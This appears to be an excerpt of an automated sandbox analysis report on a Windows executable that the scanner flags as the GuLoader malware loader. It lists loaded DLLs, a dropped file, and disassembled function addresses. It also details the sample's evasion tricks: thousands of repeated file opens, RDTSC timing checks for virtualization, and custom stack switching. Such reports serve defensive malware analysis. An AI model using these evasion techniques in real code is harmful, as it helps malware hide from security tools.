    Source: C:\Users\user\Desktop\3507071243740008011.exeSection loaded: textinputframework.dllJump to behavior
    Source: C:\Users\user\Desktop\3507071243740008011.exeSection loaded: coreuicomponents.dllJump to behavior
    Source: C:\Users\user\Desktop\3507071243740008011.exeSection loaded: coremessaging.dllJump to behavior
    Source: C:\Users\user\Desktop\3507071243740008011.exeSection loaded: ntmarta.dllJump to behavior
    Source: C:\Users\user\Desktop\3507071243740008011.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Users\user\Desktop\3507071243740008011.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Users\user\Desktop\3507071243740008011.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Users\user\Desktop\3507071243740008011.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Users\user\Desktop\3507071243740008011.exeSection loaded: iertutil.dllJump to behavior
    Source: C:\Users\user\Desktop\3507071243740008011.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Users\user\Desktop\3507071243740008011.exeSection loaded: powrprof.dllJump to behavior
    Source: C:\Users\user\Desktop\3507071243740008011.exeSection loaded: winhttp.dllJump to behavior
    Source: C:\Users\user\Desktop\3507071243740008011.exeSection loaded: wkscli.dllJump to behavior
    Source: C:\Users\user\Desktop\3507071243740008011.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Users\user\Desktop\3507071243740008011.exeSection loaded: umpdc.dllJump to behavior
    Source: C:\Users\user\Desktop\3507071243740008011.exeSection loaded: wininet.dllJump to behavior
    Source: C:\Users\user\Desktop\3507071243740008011.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Users\user\Desktop\3507071243740008011.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Users\user\Desktop\3507071243740008011.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Users\user\Desktop\3507071243740008011.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Users\user\Desktop\3507071243740008011.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Users\user\Desktop\3507071243740008011.exeSection loaded: mswsock.dllJump to behavior
    Source: C:\Users\user\Desktop\3507071243740008011.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Users\user\Desktop\3507071243740008011.exeSection loaded: winnsi.dllJump to behavior
    Source: C:\Users\user\Desktop\3507071243740008011.exeSection loaded: urlmon.dllJump to behavior
    Source: C:\Users\user\Desktop\3507071243740008011.exeSection loaded: srvcli.dllJump to behavior
    Source: C:\Users\user\Desktop\3507071243740008011.exeSection loaded: dnsapi.dllJump to behavior
    Source: C:\Users\user\Desktop\3507071243740008011.exeSection loaded: rasadhlp.dllJump to behavior
    Source: C:\Users\user\Desktop\3507071243740008011.exeSection loaded: fwpuclnt.dllJump to behavior
    Source: C:\Users\user\Desktop\3507071243740008011.exeSection loaded: schannel.dllJump to behavior
    Source: C:\Users\user\Desktop\3507071243740008011.exeSection loaded: mskeyprotect.dllJump to behavior
    Source: C:\Users\user\Desktop\3507071243740008011.exeSection loaded: ntasn1.dllJump to behavior
    Source: C:\Users\user\Desktop\3507071243740008011.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Users\user\Desktop\3507071243740008011.exeSection loaded: dpapi.dllJump to behavior
    Source: C:\Users\user\Desktop\3507071243740008011.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Users\user\Desktop\3507071243740008011.exeSection loaded: rsaenh.dllJump to behavior
    Source: C:\Users\user\Desktop\3507071243740008011.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Users\user\Desktop\3507071243740008011.exeSection loaded: gpapi.dllJump to behavior
    Source: C:\Users\user\Desktop\3507071243740008011.exeSection loaded: ncrypt.dllJump to behavior
    Source: C:\Users\user\Desktop\3507071243740008011.exeSection loaded: ncryptsslp.dllJump to behavior
    Source: C:\Users\user\Desktop\3507071243740008011.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
    Source: 3507071243740008011.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
    Source: Binary string: mshtml.pdb source: 3507071243740008011.exe, 00000004.00000001.2443890580.0000000000649000.00000020.00000001.01000000.00000006.sdmp
    Source: Binary string: wntdll.pdbUGP source: 3507071243740008011.exe, 00000004.00000002.2791404664.0000000036ECE000.00000040.00001000.00020000.00000000.sdmp, 3507071243740008011.exe, 00000004.00000003.2727268386.00000000369C6000.00000004.00000020.00020000.00000000.sdmp, 3507071243740008011.exe, 00000004.00000002.2791404664.0000000036D30000.00000040.00001000.00020000.00000000.sdmp, 3507071243740008011.exe, 00000004.00000003.2729820928.0000000036B7C000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: wntdll.pdb source: 3507071243740008011.exe, 3507071243740008011.exe, 00000004.00000002.2791404664.0000000036ECE000.00000040.00001000.00020000.00000000.sdmp, 3507071243740008011.exe, 00000004.00000003.2727268386.00000000369C6000.00000004.00000020.00020000.00000000.sdmp, 3507071243740008011.exe, 00000004.00000002.2791404664.0000000036D30000.00000040.00001000.00020000.00000000.sdmp, 3507071243740008011.exe, 00000004.00000003.2729820928.0000000036B7C000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: mshtml.pdbUGP source: 3507071243740008011.exe, 00000004.00000001.2443890580.0000000000649000.00000020.00000001.01000000.00000006.sdmp

    Data Obfuscation

    barindex
    Yara detected GuLoader
    Source: Yara matchFile source: 00000000.00000002.2445417513.0000000005438000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 0_2_10001B18 GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,0_2_10001B18
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 0_2_10002DE0 push eax; ret 0_2_10002E0E
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D3135D push eax; iretd 4_2_36D31369
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D327FA pushad ; ret 4_2_36D327F9
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D3225F pushad ; ret 4_2_36D327F9
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D3283D push eax; iretd 4_2_36D32858
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D609AD push ecx; mov dword ptr [esp], ecx4_2_36D609B6
    Source: C:\Users\user\Desktop\3507071243740008011.exeFile created: C:\Users\user\AppData\Local\Temp\nsaD5CD.tmp\System.dllJump to dropped file
    Source: C:\Users\user\Desktop\3507071243740008011.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\3507071243740008011.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\3507071243740008011.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

    Malware Analysis System Evasion

    barindex
    Opens the same file many times (likely Sandbox evasion)
    Source: C:\Users\user\Desktop\3507071243740008011.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Saddukisk233\centerleder.ini count: 45722Jump to behavior
    Switches to a custom stack to bypass stack traces
    Source: C:\Users\user\Desktop\3507071243740008011.exeAPI/Special instruction interceptor: Address: 59AA0FB
    Source: C:\Users\user\Desktop\3507071243740008011.exeAPI/Special instruction interceptor: Address: 458A0FB
    Tries to detect virtualization through RDTSC time measurements
    Source: C:\Users\user\Desktop\3507071243740008011.exeRDTSC instruction interceptor: First address: 596FD31 second address: 596FD31 instructions: 0x00000000 rdtsc 0x00000002 test cx, cx 0x00000005 cmp ebx, ecx 0x00000007 jc 00007FF06CB84AC7h 0x00000009 inc ebp 0x0000000a inc ebx 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\3507071243740008011.exeRDTSC instruction interceptor: First address: 454FD31 second address: 454FD31 instructions: 0x00000000 rdtsc 0x00000002 test cx, cx 0x00000005 cmp ebx, ecx 0x00000007 jc 00007FF06CCEEEF7h 0x00000009 inc ebp 0x0000000a inc ebx 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36DDD1C0 rdtsc 4_2_36DDD1C0
    Source: C:\Users\user\Desktop\3507071243740008011.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsaD5CD.tmp\System.dllJump to dropped file
    Source: C:\Users\user\Desktop\3507071243740008011.exeAPI coverage: 0.1 %
    Source: C:\Users\user\Desktop\3507071243740008011.exe TID: 2496Thread sleep time: -30000s >= -30000sJump to behavior
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 0_2_004065C5 FindFirstFileW,FindClose,0_2_004065C5
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 0_2_00405990 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405990
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 0_2_00402862 FindFirstFileW,0_2_00402862
    Source: 3507071243740008011.exe, 00000004.00000002.2767716944.0000000006B4B000.00000004.00000020.00020000.00000000.sdmp, 3507071243740008011.exe, 00000004.00000003.2727628175.0000000006B4B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWy
    Source: 3507071243740008011.exe, 00000004.00000002.2767716944.0000000006B4B000.00000004.00000020.00020000.00000000.sdmp, 3507071243740008011.exe, 00000004.00000003.2727628175.0000000006B4B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
    Source: C:\Users\user\Desktop\3507071243740008011.exeAPI call chain: ExitProcess graph end nodegraph_0-4600
    Source: C:\Users\user\Desktop\3507071243740008011.exeAPI call chain: ExitProcess graph end nodegraph_0-4604
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36DDD1C0 rdtsc 4_2_36DDD1C0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36DA35C0 NtCreateMutant,LdrInitializeThunk,4_2_36DA35C0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 0_2_10001B18 GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,0_2_10001B18
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36E1D6F0 mov eax, dword ptr fs:[00000030h]4_2_36E1D6F0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D916CF mov eax, dword ptr fs:[00000030h]4_2_36D916CF
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D6B6C0 mov eax, dword ptr fs:[00000030h]4_2_36D6B6C0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D6B6C0 mov eax, dword ptr fs:[00000030h]4_2_36D6B6C0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D6B6C0 mov eax, dword ptr fs:[00000030h]4_2_36D6B6C0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D6B6C0 mov eax, dword ptr fs:[00000030h]4_2_36D6B6C0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D6B6C0 mov eax, dword ptr fs:[00000030h]4_2_36D6B6C0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D6B6C0 mov eax, dword ptr fs:[00000030h]4_2_36D6B6C0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36E1F6C7 mov eax, dword ptr fs:[00000030h]4_2_36E1F6C7
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36E216CC mov eax, dword ptr fs:[00000030h]4_2_36E216CC
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36E216CC mov eax, dword ptr fs:[00000030h]4_2_36E216CC
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36E216CC mov eax, dword ptr fs:[00000030h]4_2_36E216CC
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36E216CC mov eax, dword ptr fs:[00000030h]4_2_36E216CC
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36DF36EE mov eax, dword ptr fs:[00000030h]4_2_36DF36EE
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36DF36EE mov eax, dword ptr fs:[00000030h]4_2_36DF36EE
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36DF36EE mov eax, dword ptr fs:[00000030h]4_2_36DF36EE
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36DF36EE mov eax, dword ptr fs:[00000030h]4_2_36DF36EE
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36DF36EE mov eax, dword ptr fs:[00000030h]4_2_36DF36EE
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36DF36EE mov eax, dword ptr fs:[00000030h]4_2_36DF36EE
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D8D6E0 mov eax, dword ptr fs:[00000030h]4_2_36D8D6E0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D8D6E0 mov eax, dword ptr fs:[00000030h]4_2_36D8D6E0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36DE368C mov eax, dword ptr fs:[00000030h]4_2_36DE368C
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36DE368C mov eax, dword ptr fs:[00000030h]4_2_36DE368C
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36DE368C mov eax, dword ptr fs:[00000030h]4_2_36DE368C
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36DE368C mov eax, dword ptr fs:[00000030h]4_2_36DE368C
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D576B2 mov eax, dword ptr fs:[00000030h]4_2_36D576B2
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D576B2 mov eax, dword ptr fs:[00000030h]4_2_36D576B2
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D576B2 mov eax, dword ptr fs:[00000030h]4_2_36D576B2
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D5D6AA mov eax, dword ptr fs:[00000030h]4_2_36D5D6AA
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D5D6AA mov eax, dword ptr fs:[00000030h]4_2_36D5D6AA
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D99660 mov eax, dword ptr fs:[00000030h]4_2_36D99660
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D99660 mov eax, dword ptr fs:[00000030h]4_2_36D99660
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36DFD660 mov eax, dword ptr fs:[00000030h]4_2_36DFD660
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D63616 mov eax, dword ptr fs:[00000030h]4_2_36D63616
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D63616 mov eax, dword ptr fs:[00000030h]4_2_36D63616
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36E35636 mov eax, dword ptr fs:[00000030h]4_2_36E35636
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D9F603 mov eax, dword ptr fs:[00000030h]4_2_36D9F603
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D91607 mov eax, dword ptr fs:[00000030h]4_2_36D91607
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D5F626 mov eax, dword ptr fs:[00000030h]4_2_36D5F626
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D5F626 mov eax, dword ptr fs:[00000030h]4_2_36D5F626
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D5F626 mov eax, dword ptr fs:[00000030h]4_2_36D5F626
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D5F626 mov eax, dword ptr fs:[00000030h]4_2_36D5F626
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D5F626 mov eax, dword ptr fs:[00000030h]4_2_36D5F626
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D5F626 mov eax, dword ptr fs:[00000030h]4_2_36D5F626
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D5F626 mov eax, dword ptr fs:[00000030h]4_2_36D5F626
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D5F626 mov eax, dword ptr fs:[00000030h]4_2_36D5F626
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D5F626 mov eax, dword ptr fs:[00000030h]4_2_36D5F626
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D657C0 mov eax, dword ptr fs:[00000030h]4_2_36D657C0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D657C0 mov eax, dword ptr fs:[00000030h]4_2_36D657C0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D657C0 mov eax, dword ptr fs:[00000030h]4_2_36D657C0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D6D7E0 mov ecx, dword ptr fs:[00000030h]4_2_36D6D7E0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36E1D7B0 mov eax, dword ptr fs:[00000030h]4_2_36E1D7B0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36E1D7B0 mov eax, dword ptr fs:[00000030h]4_2_36E1D7B0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36E337B6 mov eax, dword ptr fs:[00000030h]4_2_36E337B6
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D8D7B0 mov eax, dword ptr fs:[00000030h]4_2_36D8D7B0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36E1F78A mov eax, dword ptr fs:[00000030h]4_2_36E1F78A
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D5F7BA mov eax, dword ptr fs:[00000030h]4_2_36D5F7BA
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D5F7BA mov eax, dword ptr fs:[00000030h]4_2_36D5F7BA
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D5F7BA mov eax, dword ptr fs:[00000030h]4_2_36D5F7BA
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D5F7BA mov eax, dword ptr fs:[00000030h]4_2_36D5F7BA
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D5F7BA mov eax, dword ptr fs:[00000030h]4_2_36D5F7BA
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D5F7BA mov eax, dword ptr fs:[00000030h]4_2_36D5F7BA
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D5F7BA mov eax, dword ptr fs:[00000030h]4_2_36D5F7BA
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D5F7BA mov eax, dword ptr fs:[00000030h]4_2_36D5F7BA
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D5F7BA mov eax, dword ptr fs:[00000030h]4_2_36D5F7BA
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36DEF7AF mov eax, dword ptr fs:[00000030h]4_2_36DEF7AF
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36DEF7AF mov eax, dword ptr fs:[00000030h]4_2_36DEF7AF
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36DEF7AF mov eax, dword ptr fs:[00000030h]4_2_36DEF7AF
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36DEF7AF mov eax, dword ptr fs:[00000030h]4_2_36DEF7AF
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36DEF7AF mov eax, dword ptr fs:[00000030h]4_2_36DEF7AF
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36DE97A9 mov eax, dword ptr fs:[00000030h]4_2_36DE97A9
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D73740 mov eax, dword ptr fs:[00000030h]4_2_36D73740
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D73740 mov eax, dword ptr fs:[00000030h]4_2_36D73740
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D73740 mov eax, dword ptr fs:[00000030h]4_2_36D73740
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36E33749 mov eax, dword ptr fs:[00000030h]4_2_36E33749
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D5B765 mov eax, dword ptr fs:[00000030h]4_2_36D5B765
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D5B765 mov eax, dword ptr fs:[00000030h]4_2_36D5B765
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D5B765 mov eax, dword ptr fs:[00000030h]4_2_36D5B765
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D5B765 mov eax, dword ptr fs:[00000030h]4_2_36D5B765
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36E0375F mov eax, dword ptr fs:[00000030h]4_2_36E0375F
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36E0375F mov eax, dword ptr fs:[00000030h]4_2_36E0375F
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36E0375F mov eax, dword ptr fs:[00000030h]4_2_36E0375F
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36E0375F mov eax, dword ptr fs:[00000030h]4_2_36E0375F
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36E0375F mov eax, dword ptr fs:[00000030h]4_2_36E0375F
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D9F71F mov eax, dword ptr fs:[00000030h]4_2_36D9F71F
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D9F71F mov eax, dword ptr fs:[00000030h]4_2_36D9F71F
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36E2972B mov eax, dword ptr fs:[00000030h]4_2_36E2972B
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36E1F72E mov eax, dword ptr fs:[00000030h]4_2_36E1F72E
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D65702 mov eax, dword ptr fs:[00000030h]4_2_36D65702
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D65702 mov eax, dword ptr fs:[00000030h]4_2_36D65702
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D67703 mov eax, dword ptr fs:[00000030h]4_2_36D67703
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36E3B73C mov eax, dword ptr fs:[00000030h]4_2_36E3B73C
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36E3B73C mov eax, dword ptr fs:[00000030h]4_2_36E3B73C
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36E3B73C mov eax, dword ptr fs:[00000030h]4_2_36E3B73C
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36E3B73C mov eax, dword ptr fs:[00000030h]4_2_36E3B73C
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D59730 mov eax, dword ptr fs:[00000030h]4_2_36D59730
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D59730 mov eax, dword ptr fs:[00000030h]4_2_36D59730
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D6973A mov eax, dword ptr fs:[00000030h]4_2_36D6973A
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D6973A mov eax, dword ptr fs:[00000030h]4_2_36D6973A
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D95734 mov eax, dword ptr fs:[00000030h]4_2_36D95734
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D63720 mov eax, dword ptr fs:[00000030h]4_2_36D63720
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D7F720 mov eax, dword ptr fs:[00000030h]4_2_36D7F720
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D7F720 mov eax, dword ptr fs:[00000030h]4_2_36D7F720
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D7F720 mov eax, dword ptr fs:[00000030h]4_2_36D7F720
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36E094E0 mov eax, dword ptr fs:[00000030h]4_2_36E094E0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36E354DB mov eax, dword ptr fs:[00000030h]4_2_36E354DB
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D69486 mov eax, dword ptr fs:[00000030h]4_2_36D69486
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D69486 mov eax, dword ptr fs:[00000030h]4_2_36D69486
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36E074B0 mov eax, dword ptr fs:[00000030h]4_2_36E074B0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D5B480 mov eax, dword ptr fs:[00000030h]4_2_36D5B480
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D574B0 mov eax, dword ptr fs:[00000030h]4_2_36D574B0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D574B0 mov eax, dword ptr fs:[00000030h]4_2_36D574B0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D934B0 mov eax, dword ptr fs:[00000030h]4_2_36D934B0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D6B440 mov eax, dword ptr fs:[00000030h]4_2_36D6B440
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D6B440 mov eax, dword ptr fs:[00000030h]4_2_36D6B440
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D6B440 mov eax, dword ptr fs:[00000030h]4_2_36D6B440
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D6B440 mov eax, dword ptr fs:[00000030h]4_2_36D6B440
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D6B440 mov eax, dword ptr fs:[00000030h]4_2_36D6B440
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D6B440 mov eax, dword ptr fs:[00000030h]4_2_36D6B440
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36E3547F mov eax, dword ptr fs:[00000030h]4_2_36E3547F
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36E0B450 mov eax, dword ptr fs:[00000030h]4_2_36E0B450
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36E0B450 mov eax, dword ptr fs:[00000030h]4_2_36E0B450
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36E0B450 mov eax, dword ptr fs:[00000030h]4_2_36E0B450
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36E0B450 mov eax, dword ptr fs:[00000030h]4_2_36E0B450
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36E1F453 mov eax, dword ptr fs:[00000030h]4_2_36E1F453
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D61460 mov eax, dword ptr fs:[00000030h]4_2_36D61460
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D61460 mov eax, dword ptr fs:[00000030h]4_2_36D61460
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D61460 mov eax, dword ptr fs:[00000030h]4_2_36D61460
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D61460 mov eax, dword ptr fs:[00000030h]4_2_36D61460
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D61460 mov eax, dword ptr fs:[00000030h]4_2_36D61460
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D7F460 mov eax, dword ptr fs:[00000030h]4_2_36D7F460
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D7F460 mov eax, dword ptr fs:[00000030h]4_2_36D7F460
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D7F460 mov eax, dword ptr fs:[00000030h]4_2_36D7F460
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D7F460 mov eax, dword ptr fs:[00000030h]4_2_36D7F460
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D7F460 mov eax, dword ptr fs:[00000030h]4_2_36D7F460
